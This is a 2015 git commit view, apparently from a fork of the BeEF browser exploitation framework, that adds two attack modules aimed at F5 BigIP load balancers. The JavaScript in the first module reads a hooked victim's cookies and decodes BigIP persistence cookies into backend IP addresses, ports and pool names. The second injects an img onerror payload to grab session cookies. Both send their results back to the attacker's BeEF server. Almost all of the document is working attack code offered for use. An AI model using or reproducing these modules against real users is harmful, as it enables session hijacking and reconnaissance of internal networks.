Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add first modules for ADC systems

Browse Source
This commit is contained in:
Denis Kolegov
2015-03-31 04:33:10 -04:00
parent 86f99d5a51
commit bff02aaea5
6 changed files with 160 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

89
modules/network/ADC/f5_bigip_cookie_disclosure/command.js Normal file
View File

@@ -0,0 +1,89 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var poolName = 'unknown';
var routedDomain = 'unknown';
var BIGipCookieName = '';
var BIGipCookieValue = '';
var backend = '';
var result = '';
function f5CookieDecode(cookieValue){
var host;
var port;
if (cookieValue.match(/(\d{8,10})\.(\d{1,5})\./) !== null) {
host = cookieValue.split('.')[0];
host = parseInt(host);
host = '' + (host & 0xFF) + '.' +
((host >> 8) & 0xFF) + '.' +
((host >> 16) & 0xFF) + '.' +
((host >> 24) & 0xFF);
port = cookieValue.split('.')[1];
port = parseInt(port);
port = '' + (((port & 0xFF) << 8) | ((port >> 8) & 0xFF));
} else if (cookieValue.match(/rd\d+o0{20}f{4}([a-f0-9]{8})o(\d{1,5})/) !== null) {
host = cookieValue.split('ffff')[1].split('o')[0];
host = parseInt(host.slice(0,2), 16) + '.' +
parseInt(host.slice(2, 4), 16) + '.' +
parseInt(host.slice(4, 6), 16) + '.' +
parseInt(host.slice(6, 8), 16);
port = cookieValue.split('ffff')[1].split('o')[1];
port = parseInt(port).toString(16);
port = parseInt(port.slice(2, 4) + port.slice(0, 2), 16);
} else if (cookieValue.match(/vi([a-f0-9]{32})\.(\d{1,5})/) !== null) {
host = cookieValue.split('.')[0].slice(2, -1);
var decoded_host = '';
for (var i = 0; i < host.length; i += 4) {
decoded_host += host.slice(i, i + 4) + ':';
}
host = decoded_host;
port = cookieValue.split('.')[1];
port = parseInt(port);
port = '' + ( ((port & 0xFF) << 8) | ((port >> 8) & 0xFF) );
} else if (cookieValue.match(/rd\d+o([a-f0-9]{32})o(\d{1,5})/) !== null) {
host = cookieValue.split('o')[1];
var decoded_host = '';
for (var i = 0; i < host.length; i += 4){
decoded_host += host.slice(i,i+4) + ':';
}
host = decoded_host;
port = cookieValue.split('o')[2];
}
return {
host: host,
port: port
}
}
var m = document.cookie.match(/([~_\.\-\w\d]+)=(((?:\d+\.){2}\d+)|(rd\d+o0{20}f{4}\w+o\d{1,5})|(vi([a-f0-9]{32})\.(\d{1,5}))|(rd\d+o([a-f0-9]{32})o(\d{1,5})))(?:$|,|;|\s)/);
if (m !== null) {
BIGipCookieName = m[0].split('=')[0];
BIGipCookieValue = m[0].split('=')[1];
result = 'BigIP_cookie_name=' + BIGipCookieName;
// Retreive pool name via cookie name
if (BIGipCookieName.match(/^BIGipServer/) !== null) {
poolName = BIGipCookieName.split('BIGipServer')[1];
result += '&pool_name=' + poolName;
}
// Routed domain is used
if (BIGipCookieValue.match(/^rd/) !== null) {
routedDomain = BIGipCookieValue.split('rd')[1].split('o')[0];
result += '&routed_domain=' + routedDomain;
}
backend = f5CookieDecode(BIGipCookieValue);
result += '&host=' + backend.host + '&port=' + backend.port;
}
else result = 'result=BigIP coookie not found'
beef.net.send('<%= @command_url %>', <%= @command_id %>, result);
});

15
modules/network/ADC/f5_bigip_cookie_disclosure/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
f5_bigip_cookie_disclosure:
enable: true
category: ["Network","ADC"]
name: "F5 BigIP Backend Cookie Disclosure"
description: "This module detects F5 BigIP persistent cookies and exposures all available information about backend (pool name, IP address and port, routed domain)."
authors: ["dnkolegov, ovbroslavsky, neoleksov"]
target:
working: ["ALL"]

13
modules/network/ADC/f5_bigip_cookie_disclosure/module.rb Normal file
View File

@@ -0,0 +1,13 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class F5_bigip_cookie_disclosure < BeEF::Core::Command
def post_execute
return if @datastore['result'].nil?
save({'BigIPCookie' => @datastore['BigIPCookie']})
end
end

15
modules/network/ADC/f5_bigip_cookie_stealing/command.js Normal file
View File

@@ -0,0 +1,15 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var t = document.createElement('div');
t.id = 'test';
document.body.appendChild(t);
var g = document.createElement('script');
g.text = "document.getElementById(\"test\").innerHTML=\"<img src=1 onerror=result=document.cookie;>\""
t.appendChild(g);
setTimeout('beef.net.send(\'<%= @command_url %>\', <%= @command_id %>, result)', 2000)
});

15
modules/network/ADC/f5_bigip_cookie_stealing/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
f5_bigip_cookie_stealing:
enable: true
category: ["Network","ADC"]
name: "F5 BigIP User's Cookie Stealing"
description: "This module retrieves all BigIP user's session cookies, bypassing sandbox restrictions."
authors: ["dnkolegov, ovbroslavsky, neoleksov"]
target:
working: ["ALL"]

13
modules/network/ADC/f5_bigip_cookie_stealing/module.rb Normal file
View File

@@ -0,0 +1,13 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class F5_bigip_cookie_stealing < BeEF::Core::Command
def post_execute
return if @datastore['result'].nil?
save({'BigIPSessionCookies' => @datastore['BigIPSessionCookies']})
end
end